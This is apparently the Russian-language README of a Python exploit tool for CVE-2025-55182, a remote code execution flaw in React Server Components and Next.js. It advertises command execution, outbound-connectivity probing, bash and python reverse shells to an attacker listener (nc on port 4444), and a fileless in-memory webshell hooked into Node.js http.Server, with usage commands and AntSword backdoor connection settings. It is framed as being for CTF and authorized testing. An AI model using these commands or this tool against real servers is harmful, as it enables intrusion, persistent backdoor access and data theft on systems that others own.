
Автоматизированный инструмент эксплуатации для CVE-2025-55182 (React/Next.js RCE) с выполнением команд, обнаружением исходящих соединений, интерактивным обратным шеллом и постоянной инъекцией веб-шелла в память для авторизованного тестирования на проникновение и CTF-задач.
Автор: lamaper / BITs2Sys
Версия: 1.0.1
Лицензия: MIT
Данный инструмент представляет собой автоматизированное средство для пентеста, специально разработанное для CVE-2025-55182 (RCE через загрязнение цепочки прототипов React Server Components / Next.js). Он предназначен для соревнований CTF и авторизованных проектов по безопасности, объединяя возможности проверки уязвимости, обнаружения исходящего трафика, обратного шелла и внедрения память-лошадей (memory shell).
--cmd) : Использует механизм исключений NEXT_REDIRECT для точной передачи результатов выполнения команд в кодировке Base64.--check-outbound) : Автоматически проверяет способность целевой системы обращаться к DNS, HTTP и ICMP, помогая выбрать путь атаки.--shell--inject-ms) : Внедряет память-лошадь через перехват механизма диспетчеризации событий Node.js http.Server, не оставляет файлов, поддерживает постоянное управление.--ms-cmd) : Режим взаимодействия, независимый от пути эксплуатации уязвимости. После успешного внедрения можно выполнять команды через бэкдор.Инструмент разработан на Python 3, требуется только установка библиотеки requests.
pip install requests
https://github.com/assetnote/react2shell-scanner — это полезный инструмент для обнаружения.
Непосредственное получение информации о целевой системе:
python exploit.py --url http://target.com/ --cmd "id"
python exploit.py --url http://target.com/ --cmd "cat /flag"
Перед попыткой обратного шелла убедитесь, что целевая система может подключаться к внешней сети:
python exploit.py --url http://target.com/ --check-outbound
Режим Bash:
# На атакующей машине выполните прослушивание: nc -lvnp 4444
python exploit.py --url http://target.com/ --shell bash --ip <ваш IP> --port 4444
Режим Python:
python exploit.py --url http://target.com/ --shell python --ip <ваш IP> --port 4444
Внедрение память-лошади:
python exploit.py --url http://target.com/ --inject-ms
Выполнение команд через память-лошадь (используется после успешного внедрения):
python exploit.py --url http://target.com/ --ms-cmd "whoami"
Примечание: по умолчанию память-лошадь монтируется на путь /?pass, запускается отправкой POST-запроса с параметром pwd.
Подключение через AntSword (Китайский муравьиный меч):
Пароль подключения: pwd, режим подключения: CMDLINUX
Данный инструмент предназначен только для исследований безопасности в рамках законодательства, соревнований CTF и авторизованных пентестов. Запрещается использовать его для нелегальных атак. Все последствия использования инструмента ложатся на пользователя.